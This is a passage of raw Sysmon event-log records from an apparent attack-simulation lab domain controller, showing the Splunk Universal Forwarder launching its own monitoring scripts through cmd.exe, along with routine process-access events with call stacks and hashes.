Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002176Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.919{733EE690-3E0E-5F80-6200-000000007F01}4040C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002175Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0E-5F80-6100-000000007F01}3504C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002174Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002173Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002172Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002171Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002170Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002169Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002168Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002167Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002166Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002165Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E0E-5F80-6100-000000007F01}3504C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002164Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.807{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0E-5F80-6100-000000007F01}3504C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002163Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.809{733EE690-3E0E-5F80-6100-000000007F01}3504C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002162Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0E-5F80-6000-000000007F01}3824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002161Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002160Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002158Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002157Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002156Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002155Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002154Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002153Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002152Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0E-5F80-6000-000000007F01}3824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002151Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.698{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0E-5F80-6000-000000007F01}3824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program 